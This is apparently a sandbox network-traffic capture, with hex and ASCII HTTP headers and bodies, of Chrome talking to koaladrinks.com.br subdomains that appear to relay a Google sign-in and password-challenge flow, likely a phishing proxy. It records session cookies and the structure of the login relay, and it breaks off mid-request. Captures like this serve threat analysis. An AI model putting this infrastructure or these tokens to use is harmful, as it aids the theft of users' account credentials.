                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      2025-01-10 08:28:11 UTC13INData Raw: 41 6c 6c 6f 77 3a 20 50 4f 53 54 0d 0a
                                                      Data Ascii: Allow: POST
                                                      2025-01-10 08:28:11 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:11 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:11 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:11 UTC47INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                      Data Ascii: Content-Type: application/json; charset=utf-8
                                                      2025-01-10 08:28:11 UTC83INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                      2025-01-10 08:28:12 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 31 31 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:11 GMT
                                                      2025-01-10 08:28:12 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      2025-01-10 08:28:12 UTC196INData Raw: 50 65 72 6d 69 73 73 69 6f 6e 73 2d 50 6f 6c 69 63 79 3a 20 63 68 2d 75 61 2d 61 72 63 68 3d 2a 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 2d 6c 69 73 74 3d 2a 2c 20 63 68 2d 75 61 2d 6d 6f 64 65 6c 3d 2a 2c 20 63 68 2d 75 61 2d 77 6f 77 36 34 3d 2a 2c 20 63 68 2d 75 61 2d 66 6f 72 6d 2d 66 61 63 74 6f 72 73 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 2d 76 65 72 73 69 6f 6e 3d 2a 0d 0a
                                                      Data Ascii: Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      90192.168.2.949822139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:12 UTC1268OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Content-Length: 982
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-Type: text/plain;charset=UTF-8
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      X-Goog-AuthUser: 0
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
                                                      2025-01-10 08:28:12 UTC982OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 34 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 35 35 38 2c 5b 5b 22 31 37 33 36 34 39 37 36 38 30 30 30 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                      Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[4,0,0,0,0]]],558,[["1736497680000",null,null,null,
                                                      2025-01-10 08:28:12 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:12 UTC40INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a
                                                      Data Ascii: Access-Control-Allow-Credentials: true
                                                      2025-01-10 08:28:12 UTC45INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 58 2d 50 6c 61 79 6c 6f 67 2d 57 65 62 0d 0a
                                                      Data Ascii: Access-Control-Allow-Headers: X-Playlog-Web
                                                      2025-01-10 08:28:12 UTC66INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 69 6a 67 62 6c 6f 61 64 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 0d 0a
                                                      Data Ascii: Access-Control-Allow-Origin: https://ijgbload.koaladrinks.com.br
                                                      2025-01-10 08:28:12 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:12 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:12 UTC41INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/plain; charset=UTF-8
                                                      2025-01-10 08:28:12 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:28:12 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 31 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:12 GMT
                                                      2025-01-10 08:28:13 UTC17INData Raw: 53 65 72 76 65 72 3a 20 50 6c 61 79 6c 6f 67 0d 0a
                                                      Data Ascii: Server: Playlog


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      91192.168.2.949823139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:14 UTC666OUTGET /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
                                                      2025-01-10 08:28:14 UTC26INHTTP/1.1 400 Bad Request
                                                      2025-01-10 08:28:14 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:14 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:14 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:14 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/html; charset=UTF-8
                                                      2025-01-10 08:28:14 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 31 34 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:14 GMT
                                                      2025-01-10 08:28:14 UTC17INData Raw: 53 65 72 76 65 72 3a 20 50 6c 61 79 6c 6f 67 0d 0a
                                                      Data Ascii: Server: Playlog
                                                      2025-01-10 08:28:14 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                      Data Ascii: Transfer-Encoding: chunked
                                                      2025-01-10 08:28:14 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:28:14 UTC5INData Raw: 36 34 39 0d 0a
                                                      Data Ascii: 649
                                                      2025-01-10 08:28:14 UTC1609INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d
                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      92192.168.2.949824139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:15 UTC1305OUTGET /s/a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202 HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      Content-Type: application/json
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J; OTZ=7903228_76_76_104100_72_446760; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      93192.168.2.949826139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:24 UTC1252OUTPOST /log?hasfast=true&authuser=0&format=json HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Content-Length: 1118
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      Content-Type: text/plain;charset=UTF-8
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
                                                      2025-01-10 08:28:24 UTC1118OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 62 6f 71 5f 69 64 65 6e 74 69 74 79 66 72 6f 6e 74 65 6e 64 61 75 74 68 75 69 73 65 72 76 65 72 5f 32 30 32 35 30 31 30 35 2e 30 38 5f 70 30 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 33 2c 30 2c 30
                                                      Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"boq_identityfrontendauthuiserver_20250105.08_p0",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[3,0,0
                                                      2025-01-10 08:28:24 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:24 UTC40INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a
                                                      Data Ascii: Access-Control-Allow-Credentials: true
                                                      2025-01-10 08:28:24 UTC45INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 58 2d 50 6c 61 79 6c 6f 67 2d 57 65 62 0d 0a
                                                      Data Ascii: Access-Control-Allow-Headers: X-Playlog-Web
                                                      2025-01-10 08:28:24 UTC66INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 69 6a 67 62 6c 6f 61 64 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 0d 0a
                                                      Data Ascii: Access-Control-Allow-Origin: https://ijgbload.koaladrinks.com.br
                                                      2025-01-10 08:28:24 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:24 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:24 UTC41INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/plain; charset=UTF-8
                                                      2025-01-10 08:28:24 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:28:24 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 32 34 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:24 GMT
                                                      2025-01-10 08:28:24 UTC17INData Raw: 53 65 72 76 65 72 3a 20 50 6c 61 79 6c 6f 67 0d 0a
                                                      Data Ascii: Server: Playlog


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      94192.168.2.949828139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:28 UTC1291OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Content-Length: 614
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      X-Goog-AuthUser: 0
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
                                                      2025-01-10 08:28:28 UTC614OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 34 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 33 36 34 39 37 37 30 36 32 34 32 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c
                                                      Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"41",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[1,0,0,0,0]]],1828,[["1736497706242",null,null,null


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      95192.168.2.949827139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:28 UTC1828OUTPOST /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=B4hajb&source-path=%2Fv3%2Fsignin%2Fchallenge%2Fpwd&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&_reqid=512469&rt=c HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Content-Length: 4165
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      x-goog-ext-278367001-jspb: ["GlifWebSignIn"]
                                                      X-Same-Domain: 1
                                                      x-goog-ext-391502476-jspb: ["S1847760580:1736497656249061",null,null,"AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ"]
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
